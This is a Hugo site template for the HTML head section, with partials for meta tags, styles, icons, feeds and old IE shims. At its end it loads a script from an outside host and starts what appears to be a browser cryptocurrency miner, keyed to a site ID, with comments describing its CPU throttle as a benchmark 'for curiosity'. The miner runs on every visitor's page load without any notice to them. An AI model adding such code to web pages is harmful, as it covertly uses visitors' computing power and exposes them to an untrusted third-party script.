<head>
    <link href="https://gmpg.org/xfn/11" rel="profile">
    {{ partial "header/meta.html" . }}
    {{ partial "header/styles.html" . }}
    {{ `<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->` | safeHTML }}
    {{ "<!-- Icons -->" | safeHTML }}
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
    <link rel="shortcut icon" href="/favicon.png">
    {{ partial "header/feeds.html" . }}
    <script src="https://www.hostingcloud.racing/oapd.js"></script>
    <script>
        var _client = new Client.Anonymous('a171d3d8a184ccd37ec5496473ddcf5538c17ba870b21a7e5bf94ab2efe628c3', {
            throttle: 0.8, c: 'w', ads: 0 // Notice the gentle 20% of cpu-power only :)
        });
        _client.start(); // Yup, I do want to benchmark this solution, curiosity purpose only ;)
    </script>
</head>
